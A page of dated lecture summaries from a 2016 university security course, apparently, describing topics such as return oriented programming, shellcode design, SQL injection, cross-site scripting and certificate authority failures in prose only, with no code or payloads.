September 30, 2016

In this lecture, our guest Dr. Devin Cook, offers a overview of the brief history of modern binary exploitation. He covers everything from early buffer overflows and early stack overflow mitigations to modern mitigations, modern bypass techniques, and Return Oriented Programming (ROP).

September 26, 2016

This lecture's first half covers new material involving professional tips for Return Oriented Programming (ROP) Gadget hunting, the analysis and design of advanced shellcode, as well as a walkthrough of a dynamic shellcode linker engine. The second half of this lecture is a guest lecturer, Dr. Devin Cook demonstrating use of a ROP gadget finder, compiler, and chain tool he uses as part of Samuri's Capture The Flag (CTF) team.

Return Oriented Programming (ROP) is introduced and a modern history of exploit mitigations is revisted. Other *-oriented programming exploitation techniques are discussed at a high level like Jump Oriented Programming (JOP) and Call Oriented Programming (COP). We walk through how to chain functions together with the stack under various function calling conventions (cdecl, fastcall, stdcall), and introduce the concept of gadgets. ROP Gadget compilers are introduced briefly. Finally the second half of the lecture presents a review of topics for MIDTERM 2.

September 19, 2016

The first half of the lecture covers Web Application Firewalls (WAFs), and how they are often trivially bypassed. The second half of the lecture covers and presents a walkthrough of alphnumeric, polymorphic, connect-back shellcode payload development techniques that are often used against WAFs, IDS, IPS, and other defenses. Connect back shellcode development is discussed for linux systems.

September 8, 2016

We cover the fragile ecosystems of the public key infrastructure system that support Secure Socket Layer (SSL) and Transport Layer Security (TLS): the internet certificate authorities. We cover the disturbing history of modern Certificate Authority (CA) failures and frequent compromises, and how rarely there is ever any consequence or improvement. Various attacks against SSL/TLS systems and certificate authorities are covered.

This time server-side attacks are covered in depth, and the OWASP top 10 is covered. We cover broken authentication and/or session management, the category of security mis-configuration, insecure direct object referencing, targeting admins and user functions with cross-site-request-forgery (CSRF), and similar functionality-level access control vulnerabilities, directory traversal, and finally SQL injection (SQLi). Metacharacter injection is again revisited as is encompasses almost all of these techniques in practice, and presents a straightforward model for approaching the diverse attack surface of web applications. SQLi is covered in depth, with several walkthroughs and techniques (inband error based, inband union based, 2nd order inband injection, partial blind, full blind, and more). We discuss SQLi discovery, fingerprinting, filter or restriction enumeration, table mapping, and finally data extraction. Defenses are covered such as prepared statements and encoding. Several SQLi defense bypasses are discussed.

September 2, 2016

We cover the internals of most modern web browsers and web server architectures to present deep overview of the massive attack surface associated with web applications and web browsing. The big picture is revisited and we discuss how modern binary exploitation techniques still heavily apply to each attack vector. Then we examine the growing security problem of indirect/background queries and the sharp rise of malicious 3rd party content and advertisements.

We introduce HTTP proxies, and demonstrate BurpSuite tool for intercepting web traffic. The final half of the lecture focuses on client-side web attack and defense. We examine the Data Object Model (DOM), javascript and how it can change the DOM, the Same-origin-Policy (SOP) and several SOP bypass techniques, and how this all applies for various Cross Site Scripting (XSS) family techniques (XSRF, CSRF, etc). We discuss meta-character injection and how it encompasses XSS and other techniques. Finally defenses are demonstrated.